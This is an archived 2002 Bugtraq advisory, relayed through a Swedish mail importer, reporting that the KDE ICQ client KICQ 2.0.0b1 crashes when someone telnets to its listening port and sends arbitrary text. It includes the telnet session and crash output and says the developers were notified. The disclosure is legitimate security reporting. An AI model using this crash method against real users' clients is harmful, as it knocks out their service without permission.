7931546 2002-02-01 23:10 +0100  /39 rader/  <_kiss_@guay.com>
Sänt av: joel@lysator.liu.se
Importerad: 2002-02-02  18:03  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <20777>
Ärende: KICQ 2.0.0b1 can be remotely crashed
------------------------------------------------------------
From: _kiss_@guay.com
To: bugtraq@securityfocus.com
Message-ID: <3163169.1012601414791.JavaMail.nobody@aldebaran.guay.com>


KICQ is an ICQ client, specifically designed for the KDE. 

Versions affected:

    KICQ 2.0.0b1 using icqlib 1.0.0

Description

KICQ can be remotely crashed in a very simple way. Just telnet the
machine on wich KICQ is running on the port it's bound and feed some
garbage.

        bash-2.05$ telnet 10.0.0.1 1030
        Trying 10.0.0.1...
        Connected to 10.0.0.1.
        Escape character is '^]'.
        garbage
        Connection closed by foreign host.

KDE Crash handler window appears and something like this goes in the
console:

   KCrash: crashing.... crashRecursionCounter = 2
   KCrash: Application Name = kicq path = <unknown>

I have tried to find where in the code the error ocurrs, but the
exact place seems to change every time I execute KICQ.

Solution

I have contacted the developers and hope a patch is released soon.

More information: sourceforge.net/projects/kicq


                Rafael San Miguel Carrasco (_kiss_)
                rsanmcar@alum.uax.es
(7931546) / <_kiss_@guay.com>/------------(Ombruten)